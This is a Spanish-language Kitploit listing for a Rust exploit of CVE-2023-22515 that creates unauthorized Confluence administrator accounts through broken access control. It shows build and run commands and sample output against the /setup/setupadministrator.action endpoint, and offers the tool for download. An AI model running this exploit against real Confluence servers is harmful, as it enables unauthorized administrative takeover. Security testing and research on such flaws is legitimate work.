Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-22515-joaoviictorti — Exploit basado en Rust para CVE-2023-22515 que crea cuentas de administrador no autorizadas en Confluence Server y Data Center mediante un control de acceso roto. | Kitploit
Herramientas/GitHubGitHub/killvxk/cve-2023-22515-joaoviictorti
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubkillvxk/cve-2023-22515-joaoviictorti

CVE-2023-22515-joaoviictorti

Exploit basado en Rust para CVE-2023-22515 que crea cuentas de administrador no autorizadas en Confluence Server y Data Center mediante un control de acceso roto.

Ver Repositorio
hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-22515

  • Resumen
  • Compilación
  • Uso
  • Ejecutar CVE-2023-22515

Resumen

Confluence es una wiki empresarial basada en web desarrollada por la empresa australiana de software Atlassian. Atlassian ha sido informada de un problema reportado por algunos clientes donde atacantes externos pueden haber explotado una vulnerabilidad previamente desconocida en servidores Confluence y centros de datos de acceso público para crear cuentas de administrador de Confluence no autorizadas y acceder a instancias de Confluence.

La vulnerabilidad ha sido clasificada como CVE-2023-22515

Compilación

Primero realice la compilación con el comando:

root@kitploit:~
cargo build --release

Uso

Puede hacerlo de estas dos maneras:

root@kitploit:~
cargo run -- --target http://localhost --username "teste" --password "teste" 
root@kitploit:~
.\target\release\cve_2023_22515 --target http://localhost --username "teste" --password "teste" 

Esto mostrará la ayuda de la herramienta. Aquí están todos los parámetros que soporta:

root@kitploit:~
CVE-2023-22515

Usage: CVE_2023_22515 --target <TARGET> --username <USERNAME> --password <PASSWORD>

Options:
  -t, --target <TARGET>      Insert target
  -u, --username <USERNAME>  Insert username
  -p, --password <PASSWORD>  Insert password
  -h, --help                 Print help

Ejecutar CVE-2023-22515

root@kitploit:~
cargo run -- --target http://example.com --username "teste" --password "teste" 

[!] Request for: http://example.com/setup/setupadministrator.action
[!] Creating Administrator account
[!] Checking the answer
[+] Username created successfully: teste
[+] Password created successfully: teste
[+] Exploit ending successfully!!
Descargar herramienta